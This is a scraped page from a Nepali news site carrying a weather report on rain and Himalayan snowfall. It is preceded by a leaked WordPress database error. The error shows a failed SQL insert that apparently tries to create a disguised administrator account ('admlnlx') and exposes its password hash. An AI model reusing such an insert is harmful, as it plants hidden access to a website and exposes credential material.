WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Baq/qqvb1pCMWMWv2S4DFA5xUAvWqc0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 06:12:58', '', 'admlnlx', 'admlnlx')
४ फागुन, काठमाडौं । देशका पहाडी क्षेत्रहरूमा शनिबार विहानबाट सुरु भएको वर्षा सोमबारसम्म चल्ने मौसम पूर्वानुमान महाशाखाले जनाएको छ। शनिबार देशभर आंशिकदेखि सामान्य बदली भयो देशका उच्च पहाडी भेगहरूमा पानी परेको छ । हिमाली भेगमा हिमपात समेत भएको छ ।
महाशाखाका अनुसार आइतबार देशको पूर्वी तथा मध्य पहाडी भूभागमा आंशिक वदली रहने तथा बाँकी भूभागमा मौसम सामान्यतया सफा रहने देखिन्छ । त्यस्तै पूर्वी पहाडी भू-भागका एक वा दुई स्थानहरुमा हल्का वर्षाको सम्भावना रहेको छ।
सोमबार देशको पश्चिमि भू-भाग लगायत पूर्वी तथा मध्य पहाडी भू-भागमा आंशिकदेखि सामान्य वदली रहने तथा बाँकी भूभागमा मौसम सामान्यतया सफा रहने र देशको पश्चिमि भू-भाग लगायत पूर्वी तथा मध्य पहाडी भू-भागका केही स्थानहरुमा हल्का वर्षाको सम्भावनाका रहेको महाशाखाले जनाएको छ।